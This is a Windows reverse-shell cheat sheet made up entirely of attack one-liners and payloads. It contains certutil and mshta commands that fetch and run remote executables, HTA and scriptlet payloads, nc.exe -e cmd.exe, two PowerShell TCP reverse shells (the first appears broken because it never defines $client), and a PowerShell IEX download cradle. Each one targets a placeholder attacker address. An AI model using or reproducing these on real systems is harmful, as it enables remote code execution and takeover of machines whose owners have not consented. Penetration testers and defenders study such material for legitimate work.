Windows Reverse Shells Cheatsheet

certutil.exe -urlcache -split -f http://<placeholder_ip>:<placeholder_port>/beacon.exe C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe

mshta.exe vbscript:Close(Execute("GetObject(""script:http://<placeholder_ip>:<placeholder_port>/payload.sct"")"))

mshta.exe http://<placeholder_ip>:<placeholder_port>/payload.hta

mshta.exe \\<placeholder_ip>\folder\payload.hta

<html>
  <head>
    <HTA:APPLICATION ID="HelloExample">
    <script language="jscript">
      new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
    </script>
  </head>
  <body>
    <script>self.close();</script>
  </body>
</html>

<?XML version="1.0"?>
<scriptlet>
  <public>
  </public>
  <script language="JScript">
    <![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]>
  </script>
</scriptlet>

nc.exe -e cmd.exe <placeholder_ip> <placeholder_port>

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<placeholder_ip>",<placeholder_port>);$s=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2=$sb+"PS "+(pwd).Path+"> ";$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<placeholder_ip>',<placeholder_port>);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

powershell IEX (New-Object Net.WebClient).DownloadString('http://<placeholder_ip>:<placeholder_port>/shell.ps1')